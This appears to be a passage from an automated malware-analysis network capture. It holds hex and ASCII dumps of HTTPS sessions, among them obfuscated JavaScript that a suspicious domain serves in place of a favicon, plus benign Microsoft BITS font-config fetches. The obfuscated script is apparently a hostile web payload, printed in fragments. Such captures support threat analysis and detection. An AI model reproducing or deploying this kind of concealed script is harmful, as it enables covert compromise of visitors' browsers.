              2024-04-17 20:59:16 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
              Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
              2024-04-17 20:59:16 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
              Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
              2024-04-17 20:59:16 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
              Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
              2024-04-17 20:59:16 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
              Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
              2024-04-17 20:59:16 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
              Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
              2024-04-17 20:59:16 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
              Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
              2024-04-17 20:59:16 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
              Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
              2024-04-17 20:59:16 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
              Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
              2024-04-17 20:59:16 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
              Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449743184.31.62.93443
              TimestampBytes transferredDirectionData
              2024-04-17 20:59:19 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-04-17 20:59:19 UTC467INHTTP/1.1 200 OK
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              Content-Type: application/octet-stream
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (chd/079C)
              X-CID: 11
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-eus2-z1
              Cache-Control: public, max-age=36300
              Date: Wed, 17 Apr 2024 20:59:19 GMT
              Connection: close
              X-CID: 2


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.449744184.31.62.93443
              TimestampBytes transferredDirectionData
              2024-04-17 20:59:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
              Range: bytes=0-2147483646
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-04-17 20:59:19 UTC804INHTTP/1.1 200 OK
              ApiVersion: Distribute 1.1
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (chd/0778)
              X-CID: 11
              X-CCC: US
              X-Azure-Ref-OriginShield: Ref A: 52EA27DBDE0C4533B819423583F6692E Ref B: CH1AA2040902052 Ref C: 2023-07-09T23:10:08Z
              X-MSEdge-Ref: Ref A: 528BB8D443C042AA9AEA4EC3F75C7762 Ref B: CHI30EDGE0111 Ref C: 2023-07-09T23:11:11Z
              Content-Type: application/octet-stream
              X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
              Cache-Control: public, max-age=36237
              Date: Wed, 17 Apr 2024 20:59:19 GMT
              Content-Length: 55
              Connection: close
              X-CID: 2
              2024-04-17 20:59:19 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.449745193.163.7.1134434296C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-04-17 20:59:19 UTC356OUTGET /favicon.ico HTTP/1.1
              Host: bestresulttostart.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: cors
              Sec-Fetch-Dest: empty
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-04-17 20:59:20 UTC263INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 17 Apr 2024 20:59:20 GMT
              Content-Type: application/javascript; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Strict-Transport-Security: max-age=31536000;
              2024-04-17 20:59:20 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
              Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
              2024-04-17 20:59:20 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
              Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
              2024-04-17 20:59:20 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
              Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
              2024-04-17 20:59:20 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
              Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
              2024-04-17 20:59:20 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
              Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
              2024-04-17 20:59:20 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
              Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
              2024-04-17 20:59:20 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
              Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
